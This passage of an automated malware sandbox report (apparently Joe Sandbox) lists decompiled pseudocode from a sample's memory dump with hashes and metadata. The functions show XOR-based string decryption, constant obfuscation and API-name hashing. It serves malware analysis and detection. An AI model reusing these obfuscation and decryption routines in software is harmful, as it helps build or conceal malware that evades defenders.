                                                                                                                          • Opcode ID: 598b7658c976f58b6b23dfcb50c5aab6a4f1dbecc69da458daf606b71033e245
                                                                                                                          • Instruction ID: d940351a65acdffc36f0101095b05b1535a4eb2a1bbb4a0ad4ce32f67a7de812
                                                                                                                          • Opcode Fuzzy Hash: 598b7658c976f58b6b23dfcb50c5aab6a4f1dbecc69da458daf606b71033e245
                                                                                                                          • Instruction Fuzzy Hash: 1E410172D0120AEBCF09CFE0D94A4EEBBB2FB48314F208159E510B6260C7B95B55DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E007A8606(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                          				void* _t46;
                                                                                                                          				signed int _t50;
                                                                                                                          				unsigned int* _t63;
                                                                                                                          				signed int _t64;
                                                                                                                          				signed int _t66;
                                                                                                                          				signed int _t72;
                                                                                                                          				unsigned int _t73;
                                                                                                                          				unsigned int _t74;
                                                                                                                          				unsigned int* _t78;
                                                                                                                          				signed int* _t79;
                                                                                                                          				signed int* _t80;
                                                                                                                          				unsigned int _t82;
                                                                                                                          				void* _t88;
                                                                                                                          				void* _t90;
                                                                                                                          				void* _t92;
                                                                                                                          				void* _t93;
                                                                                                                          
                                                                                                                          				_push( *(_t92 + 0x2c));
                                                                                                                          				_push( *(_t92 + 0x2c));
                                                                                                                          				_push( *(_t92 + 0x2c));
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(_t46);
                                                                                                                          				 *(_t92 + 0x20) = 0xe2d3c4;
                                                                                                                          				_t79 =  &(__edx[1]);
                                                                                                                          				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
                                                                                                                          				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
                                                                                                                          				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
                                                                                                                          				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
                                                                                                                          				 *(_t92 + 0x28) = 0xf8496b;
                                                                                                                          				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
                                                                                                                          				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
                                                                                                                          				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
                                                                                                                          				 *(_t92 + 0x24) = 0x2326e4;
                                                                                                                          				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
                                                                                                                          				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
                                                                                                                          				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
                                                                                                                          				_t66 =  *__edx;
                                                                                                                          				_t80 =  &(_t79[1]);
                                                                                                                          				_t50 =  *_t79 ^ _t66;
                                                                                                                          				 *(_t92 + 0x2c) = _t66;
                                                                                                                          				 *(_t92 + 0x30) = _t50;
                                                                                                                          				_t30 = _t50 + 1; // 0xb
                                                                                                                          				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
                                                                                                                          				_t93 = _t92 + 0xc;
                                                                                                                          				_t63 = E00797FF2(_t82);
                                                                                                                          				 *(_t93 + 0x1c) = _t63;
                                                                                                                          				if(_t63 != 0) {
                                                                                                                          					_t90 = 0;
                                                                                                                          					_t78 = _t63;
                                                                                                                          					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
                                                                                                                          					if(_t88 != 0) {
                                                                                                                          						_t64 =  *(_t93 + 0x1c);
                                                                                                                          						do {
                                                                                                                          							_t72 =  *_t80;
                                                                                                                          							_t80 =  &(_t80[1]);
                                                                                                                          							_t73 = _t72 ^ _t64;
                                                                                                                          							 *_t78 = _t73;
                                                                                                                          							_t78 =  &(_t78[1]);
                                                                                                                          							_t74 = _t73 >> 0x10;
                                                                                                                          							 *((char*)(_t78 - 3)) = _t73 >> 8;
                                                                                                                          							 *(_t78 - 2) = _t74;
                                                                                                                          							_t90 = _t90 + 1;
                                                                                                                          							 *((char*)(_t78 - 1)) = _t74 >> 8;
                                                                                                                          						} while (_t90 < _t88);
                                                                                                                          						_t63 =  *(_t93 + 0x18);
                                                                                                                          					}
                                                                                                                          					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
                                                                                                                          				}
                                                                                                                          				return _t63;
                                                                                                                          			}




















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: &#
                                                                                                                          • API String ID: 0-2240308938
                                                                                                                          • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                          • Instruction ID: a50c5a69ecc830dfe89021029dae742592745245b24b16415524b0766ca35001
                                                                                                                          • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                          • Instruction Fuzzy Hash: E43148726083518FC305DE28C88581BFBE0FF98718F054B6DE88AA7211D774EA09CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E007ADCF7(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                          				void* _t39;
                                                                                                                          				signed int _t43;
                                                                                                                          				signed int _t60;
                                                                                                                          				signed int _t61;
                                                                                                                          				signed int _t63;
                                                                                                                          				signed int _t70;
                                                                                                                          				unsigned int _t71;
                                                                                                                          				unsigned int _t72;
                                                                                                                          				signed int _t76;
                                                                                                                          				signed int* _t77;
                                                                                                                          				signed int* _t78;
                                                                                                                          				unsigned int _t80;
                                                                                                                          				void* _t86;
                                                                                                                          				short _t88;
                                                                                                                          				void* _t90;
                                                                                                                          				void* _t91;
                                                                                                                          
                                                                                                                          				_push( *(_t90 + 0x28));
                                                                                                                          				_push( *(_t90 + 0x28));
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(_t39);
                                                                                                                          				 *(_t90 + 0x24) = 0xf19f37;
                                                                                                                          				_t77 =  &(__edx[1]);
                                                                                                                          				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
                                                                                                                          				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
                                                                                                                          				 *(_t90 + 0x20) = 0xb1a340;
                                                                                                                          				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
                                                                                                                          				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
                                                                                                                          				 *(_t90 + 0x1c) = 0x9743e1;
                                                                                                                          				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
                                                                                                                          				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
                                                                                                                          				_t63 =  *__edx;
                                                                                                                          				_t78 =  &(_t77[1]);
                                                                                                                          				_t43 =  *_t77 ^ _t63;
                                                                                                                          				 *(_t90 + 0x28) = _t63;
                                                                                                                          				 *(_t90 + 0x2c) = _t43;
                                                                                                                          				_t21 = _t43 + 1; // 0xf19f38
                                                                                                                          				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
                                                                                                                          				_t91 = _t90 + 8;
                                                                                                                          				_t60 = E00797FF2(_t80 + _t80);
                                                                                                                          				 *(_t91 + 0x1c) = _t60;
                                                                                                                          				if(_t60 != 0) {
                                                                                                                          					_t88 = 0;
                                                                                                                          					_t76 = _t60;
                                                                                                                          					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
                                                                                                                          					if(_t86 != 0) {
                                                                                                                          						_t61 =  *(_t91 + 0x1c);
                                                                                                                          						do {
                                                                                                                          							_t70 =  *_t78;
                                                                                                                          							_t78 =  &(_t78[1]);
                                                                                                                          							_t71 = _t70 ^ _t61;
                                                                                                                          							 *_t76 = _t71 & 0x000000ff;
                                                                                                                          							_t76 = _t76 + 8;
                                                                                                                          							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
                                                                                                                          							_t72 = _t71 >> 0x10;
                                                                                                                          							_t88 = _t88 + 1;
                                                                                                                          							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
                                                                                                                          							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
                                                                                                                          						} while (_t88 < _t86);
                                                                                                                          						_t60 =  *(_t91 + 0x18);
                                                                                                                          					}
                                                                                                                          					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
                                                                                                                          				}
                                                                                                                          				return _t60;
                                                                                                                          			}




















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: g|E
                                                                                                                          • API String ID: 0-3824901942
                                                                                                                          • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                          • Instruction ID: c9920c5dc08f07355f030acebc7c9d21aee3bb5ad531f3952306819460494f18
                                                                                                                          • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                          • Instruction Fuzzy Hash: CA317C766083118FC714DF29C48546AF7E0FF88318F414B6EE88AAB251D774EA09CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E007951BB() {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				void* _t72;
                                                                                                                          				intOrPtr _t83;
                                                                                                                          				signed int _t87;
                                                                                                                          				signed int _t88;
                                                                                                                          				signed int _t89;
                                                                                                                          
                                                                                                                          				_v28 = _v28 & 0x00000000;
                                                                                                                          				_v32 = 0x54cf7d;
                                                                                                                          				_v16 = 0x3835ff;
                                                                                                                          				_v16 = _v16 >> 0xa;
                                                                                                                          				_v16 = _v16 * 0x17;
                                                                                                                          				_v16 = _v16 ^ 0x00095bb8;
                                                                                                                          				_t72 = 0xe98fb1d;
                                                                                                                          				_v24 = 0x583681;
                                                                                                                          				_t87 = 0x44;
                                                                                                                          				_v24 = _v24 / _t87;
                                                                                                                          				_v24 = _v24 ^ 0x000eb9f7;
                                                                                                                          				_v12 = 0x832b1f;
                                                                                                                          				_v12 = _v12 << 5;
                                                                                                                          				_v12 = _v12 | 0x242a8544;
                                                                                                                          				_v12 = _v12 ^ 0x346a2866;
                                                                                                                          				_v8 = 0x6a77bb;
                                                                                                                          				_v8 = _v8 >> 0xe;
                                                                                                                          				_t88 = 0x19;
                                                                                                                          				_v8 = _v8 / _t88;
                                                                                                                          				_v8 = _v8 ^ 0x9d9369f0;
                                                                                                                          				_v8 = _v8 ^ 0x9d908f3a;
                                                                                                                          				_v20 = 0x4802c8;
                                                                                                                          				_t89 = 0x21;
                                                                                                                          				_v20 = _v20 / _t89;
                                                                                                                          				_v20 = _v20 + 0xffffbfc3;
                                                                                                                          				_v20 = _v20 ^ 0x000df493;
                                                                                                                          				do {
                                                                                                                          					while(_t72 != 0x9835b86) {
                                                                                                                          						if(_t72 == 0xe98fb1d) {
                                                                                                                          							_push(_t72);
                                                                                                                          							_push(_t72);
                                                                                                                          							 *0x7b3e04 = E00797FF2(0x134);
                                                                                                                          							_t72 = 0x9835b86;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						goto L5;
                                                                                                                          					}
                                                                                                                          					_t83 =  *0x7b3e04; // 0x0
                                                                                                                          					E007A0001(_v8, _t83 + 0x18, _v20);
                                                                                                                          					_t72 = 0x7dce4e4;
                                                                                                                          					L5:
                                                                                                                          				} while (_t72 != 0x7dce4e4);
                                                                                                                          				return 1;
                                                                                                                          			}
















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: f(j4
                                                                                                                          • API String ID: 0-3086030595
                                                                                                                          • Opcode ID: 92d1b2218c7a94b62be81d106e6ed868b3fea89a8d8e73e3ff8173736f61a9bb
                                                                                                                          • Instruction ID: b6ce90de867de2c09a8efd1f3df593ec7e923272cdad71861c6bde3381e8b1ac
                                                                                                                          • Opcode Fuzzy Hash: 92d1b2218c7a94b62be81d106e6ed868b3fea89a8d8e73e3ff8173736f61a9bb
                                                                                                                          • Instruction Fuzzy Hash: 80314971E01219EBCF09DFAAD9895EEBBB1FB44324F208199E505AB250D3B85F45CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00792051(void* __edx, signed int _a4, intOrPtr _a8) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				void* _t71;
                                                                                                                          				signed int _t78;
                                                                                                                          				signed int _t80;
                                                                                                                          				signed int _t83;
                                                                                                                          				signed int _t92;
                                                                                                                          				signed int _t95;
                                                                                                                          				signed short* _t97;
                                                                                                                          
                                                                                                                          				_push(_a8);
                                                                                                                          				_t97 = _a4;
                                                                                                                          				_push(_t97);
                                                                                                                          				E007A20B9(_t71);
                                                                                                                          				_v16 = 0x71ca23;
                                                                                                                          				_v12 = 0x57f692;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v4 = 0;
                                                                                                                          				_v20 = 0xd3252c;
                                                                                                                          				_v20 = _v20 + 0x4351;
                                                                                                                          				_v20 = _v20 + 0xffff5b79;
                                                                                                                          				_v20 = _v20 ^ 0x00d2c3f6;
                                                                                                                          				_a4 = 0xbb067e;
                                                                                                                          				_t83 = 0x11;
                                                                                                                          				_a4 = _a4 / _t83;
                                                                                                                          				_a4 = _a4 >> 8;
                                                                                                                          				_a4 = _a4 ^ 0xac5d3832;
                                                                                                                          				_a4 = _a4 ^ 0xac5d3334;
                                                                                                                          				_a4 = 0xab60c2;
                                                                                                                          				_a4 = _a4 << 0x10;
                                                                                                                          				_a4 = _a4 ^ 0x910d5570;
                                                                                                                          				_a4 = _a4 >> 4;
                                                                                                                          				_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                          				if( *_t97 != 0) {
                                                                                                                          					do {
                                                                                                                          						_t80 = _v20;
                                                                                                                          						_a4 = 0xbb067e;
                                                                                                                          						_a4 = _a4 / _t83;
                                                                                                                          						_a4 = _a4 >> 8;
                                                                                                                          						_a4 = _a4 ^ 0xac5d3832;
                                                                                                                          						_a4 = _a4 ^ 0xac5d3334;
                                                                                                                          						_a4 = 0xab60c2;
                                                                                                                          						_a4 = _a4 << 0x10;
                                                                                                                          						_a4 = _a4 ^ 0x910d5570;
                                                                                                                          						_a4 = _a4 >> 4;
                                                                                                                          						_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                          						_t92 = _v20 << _a4;
                                                                                                                          						_t78 =  *_t97 & 0x0000ffff;
                                                                                                                          						_t95 = _v20 << _a4;
                                                                                                                          						if(_t78 >= 0x41 && _t78 <= 0x5a) {
                                                                                                                          							_t78 = _t78 + 0x20;
                                                                                                                          						}
                                                                                                                          						_v20 = _t78;
                                                                                                                          						_t97 =  &(_t97[1]);
                                                                                                                          						_v20 = _v20 + _t92;
                                                                                                                          						_v20 = _v20 + _t95;
                                                                                                                          						_v20 = _v20 - _t80;
                                                                                                                          						_t83 = 0x11;
                                                                                                                          					} while ( *_t97 != 0);
                                                                                                                          				}
                                                                                                                          				return _v20;
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: QC
                                                                                                                          • API String ID: 0-229404352
                                                                                                                          • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                          • Instruction ID: b72ab1f7d3f2b682ec2c1555d0033ba1a0f5a4420739cfdbd0ce90f47da754fe
                                                                                                                          • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                          • Instruction Fuzzy Hash: 153117715083819BD315DF29D48905BBBE0FFC87A8F548E1DF4C9A2225D3B4C689CB5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007A176B(void* __ecx, void* __eflags) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				signed int _t87;
                                                                                                                          				signed int _t91;
                                                                                                                          				signed int _t92;
                                                                                                                          				signed int _t93;
                                                                                                                          				void* _t102;
                                                                                                                          				signed int _t103;
                                                                                                                          
                                                                                                                          				_v36 = _v36 & 0x00000000;
                                                                                                                          				_v40 = 0x355323;
                                                                                                                          				_v24 = 0x6eb9b5;
                                                                                                                          				_v24 = _v24 + 0x6c21;
                                                                                                                          				_t102 = __ecx;
                                                                                                                          				_t91 = 0x64;
                                                                                                                          				_v24 = _v24 / _t91;
                                                                                                                          				_v24 = _v24 ^ 0x0005c519;
                                                                                                                          				_v32 = 0xba69a0;
                                                                                                                          				_v32 = _v32 << 7;
                                                                                                                          				_v32 = _v32 ^ 0x5d3c95d0;
                                                                                                                          				_v20 = 0x99612d;
                                                                                                                          				_v20 = _v20 | 0x6bf7bfaf;
                                                                                                                          				_v20 = _v20 + 0x66ac;
                                                                                                                          				_v20 = _v20 ^ 0x6c036c89;
                                                                                                                          				_v16 = 0xd72900;
                                                                                                                          				_v16 = _v16 + 0xffff2462;
                                                                                                                          				_v16 = _v16 ^ 0xa7b97bfd;
                                                                                                                          				_v16 = _v16 + 0xffff7578;
                                                                                                                          				_v16 = _v16 ^ 0xa76084ba;
                                                                                                                          				_v12 = 0xeb6610;
                                                                                                                          				_t92 = 0x6f;
                                                                                                                          				_v12 = _v12 / _t92;
                                                                                                                          				_v12 = _v12 << 0xf;
                                                                                                                          				_v12 = _v12 ^ 0x2e835447;
                                                                                                                          				_v12 = _v12 ^ 0x21f4cf0c;
                                                                                                                          				_v28 = 0x644f8d;
                                                                                                                          				_v28 = _v28 << 3;
                                                                                                                          				_v28 = _v28 << 0xa;
                                                                                                                          				_v28 = _v28 ^ 0x89f1a004;
                                                                                                                          				_v8 = 0xbb77ef;
                                                                                                                          				_t93 = 0x72;
                                                                                                                          				_v8 = _v8 * 0x3c;
                                                                                                                          				_v8 = _v8 / _t93;
                                                                                                                          				_v8 = _v8 << 6;
                                                                                                                          				_v8 = _v8 ^ 0x18aaba50;
                                                                                                                          				_t87 = E007A0AE0(_v8, _v28);
                                                                                                                          				_push(_v12);
                                                                                                                          				_t103 = _t87;
                                                                                                                          				_push(_t102);
                                                                                                                          				_push(_t103);
                                                                                                                          				_push(3);
                                                                                                                          				E007980E3(_v20, _v16);
                                                                                                                          				 *((short*)(_t102 + _t103 * 2)) = 0;
                                                                                                                          				return 0;
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #S5
                                                                                                                          • API String ID: 0-40889119
                                                                                                                          • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                          • Instruction ID: a84dbf6a563248743946377fcd37e4c80757beae4fbd5ca7a777b0d472b5a740
                                                                                                                          • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                          • Instruction Fuzzy Hash: 293132B2D0020AEBCB48DFE5C94AAEEBBB1FB84304F20809AD515B6250D7B50B15CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007B09B5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				char _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				signed int _t77;
                                                                                                                          				signed int _t88;
                                                                                                                          				signed int _t89;
                                                                                                                          
                                                                                                                          				_v40 = _v40 & 0x00000000;
                                                                                                                          				_v32 = 4;
                                                                                                                          				_v52 = 0xab6069;
                                                                                                                          				_v48 = 0xcf1f96;
                                                                                                                          				_v44 = 0x29044d;
                                                                                                                          				_v24 = 0xea6416;
                                                                                                                          				_v24 = _v24 | 0x7adbff7d;
                                                                                                                          				_v24 = _v24 ^ 0x5afbff7f;
                                                                                                                          				_v16 = 0x725236;
                                                                                                                          				_v16 = _v16 + 0xffff3c91;
                                                                                                                          				_v16 = _v16 << 7;
                                                                                                                          				_t88 = 0x2b;
                                                                                                                          				_v16 = _v16 / _t88;
                                                                                                                          				_v16 = _v16 ^ 0x015653a2;
                                                                                                                          				_v12 = 0xbf3984;
                                                                                                                          				_v12 = _v12 ^ 0x457d3893;
                                                                                                                          				_t89 = 0x44;
                                                                                                                          				_v12 = _v12 / _t89;
                                                                                                                          				_v12 = _v12 + 0x25bc;
                                                                                                                          				_v12 = _v12 ^ 0x0106bc10;
                                                                                                                          				_v20 = 0xd655eb;
                                                                                                                          				_v20 = _v20 | 0x2344b0aa;
                                                                                                                          				_v20 = _v20 * 0x16;
                                                                                                                          				_v20 = _v20 ^ 0x147fb4df;
                                                                                                                          				_v8 = 0x70d8dc;
                                                                                                                          				_v8 = _v8 + 0xe534;
                                                                                                                          				_v8 = _v8 ^ 0xb5155b0d;
                                                                                                                          				_v8 = _v8 >> 7;
                                                                                                                          				_v8 = _v8 ^ 0x01640b3f;
                                                                                                                          				_v28 = 0x2d9f47;
                                                                                                                          				_v28 = _v28 + 0xffffba71;
                                                                                                                          				_v28 = _v28 ^ 0x002c2593;
                                                                                                                          				_t77 = E007994EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
                                                                                                                          				asm("sbb eax, eax");
                                                                                                                          				return  ~_t77 & _v36;
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6Rr
                                                                                                                          • API String ID: 0-3911282678
                                                                                                                          • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                          • Instruction ID: 5e0d917fb6fb8076da878fc40c8a7ed28345005f89f942472155c24f8111830c
                                                                                                                          • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                          • Instruction Fuzzy Hash: 453100B1D0021EEBDB04CFA5C94A9EEFBB5FB44318F108599D121B6250D3B85A49CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E007A8519(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				void* _t55;
                                                                                                                          
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t55);
                                                                                                                          				_v8 = 0x519131;
                                                                                                                          				_v8 = _v8 ^ 0xec4619ea;
                                                                                                                          				_v8 = _v8 + 0x48c3;
                                                                                                                          				_v8 = _v8 ^ 0x9760daa2;
                                                                                                                          				_v8 = _v8 ^ 0x7b7f7884;
                                                                                                                          				_v16 = 0xb689a0;
                                                                                                                          				_v16 = _v16 + 0x133d;
                                                                                                                          				_v16 = _v16 ^ 0x00b72bb6;
                                                                                                                          				_v12 = 0xec38eb;
                                                                                                                          				_v12 = _v12 * 0x68;
                                                                                                                          				_v12 = _v12 | 0x70f3e2c1;
                                                                                                                          				_v12 = _v12 + 0xd290;
                                                                                                                          				_v12 = _v12 ^ 0x7ff36ca2;
                                                                                                                          				_v12 = 0x452aa4;
                                                                                                                          				_v12 = _v12 ^ 0xbb670255;
                                                                                                                          				_v12 = _v12 >> 1;
                                                                                                                          				_v12 = _v12 * 0x2d;
                                                                                                                          				_v12 = _v12 ^ 0x7280165f;
                                                                                                                          				_v24 = 0xb68a33;
                                                                                                                          				_v24 = _v24 + 0xffff2941;
                                                                                                                          				_v24 = _v24 ^ 0x00b92c3b;
                                                                                                                          				_v12 = 0x340add;
                                                                                                                          				_v12 = _v12 | 0xd5e1d7f7;
                                                                                                                          				_v12 = _v12 ^ 0xd5f6168b;
                                                                                                                          				_v20 = 0x853d17;
                                                                                                                          				_v20 = _v20 + 0xcd4d;
                                                                                                                          				_v20 = _v20 ^ 0x00837917;
                                                                                                                          				return E0079A30C(_v12, _a4, E00791DB9(__ecx), _v20);
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8
                                                                                                                          • API String ID: 0-719543824
                                                                                                                          • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                          • Instruction ID: 0fc045d55c45c7c51297ab2cfc83e67ebb000605038bb91e3a2d02dca21ff2ea
                                                                                                                          • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
